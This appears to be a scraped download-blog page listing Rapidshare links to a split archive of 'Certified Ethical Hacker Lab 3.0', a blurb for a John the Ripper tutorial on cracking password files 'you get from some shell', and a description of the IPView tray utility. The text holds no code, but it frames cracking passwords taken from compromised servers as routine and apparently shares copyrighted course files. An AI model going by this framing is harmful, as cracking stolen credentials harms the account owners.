http://rapidshare.com/files/27445021/Certified_Ethical_Hacker_Lab_3.0.part01.rar
http://rapidshare.com/files/27445043/Certified_Ethical_Hacker_Lab_3.0.part02.rar
http://rapidshare.com/files/27448148/Certified_Ethical_Hacker_Lab_3.0.part03.rar
http://rapidshare.com/files/27448136/Certified_Ethical_Hacker_Lab_3.0.part04.rar
http://rapidshare.com/files/27452154/Certified_Ethical_Hacker_Lab_3.0.part05.rar
http://rapidshare.com/files/27452159/Certified_Ethical_Hacker_Lab_3.0.part06.rar
http://rapidshare.com/files/27455943/Certified_Ethical_Hacker_Lab_3.0.part07.rar
http://rapidshare.com/files/27455952/Certified_Ethical_Hacker_Lab_3.0.part08.rar
http://rapidshare.com/files/27459009/Certified_Ethical_Hacker_Lab_3.0.part09.rar
http://rapidshare.com/files/27458158/Certified_Ethical_Hacker_Lab_3.0.part10.rar



You don’t know how to decrypt passfile that you get from some shell? Simply check this tutorial and you’ll know most of things about decrypting using JTR.


Download



IPView



The IPView application was designed to show your IP-address in the traybar. This version is capable of showing multiple IP-addresses. When started, IPView will put an icon in the traybar (next to the clock).If you move your mouse over the icon, you’ll see your IP-address. However,sometimes your computer will have more than one IP-address (e.g. if you have an ethernet card).


Download



تطوير : مدونة حكمات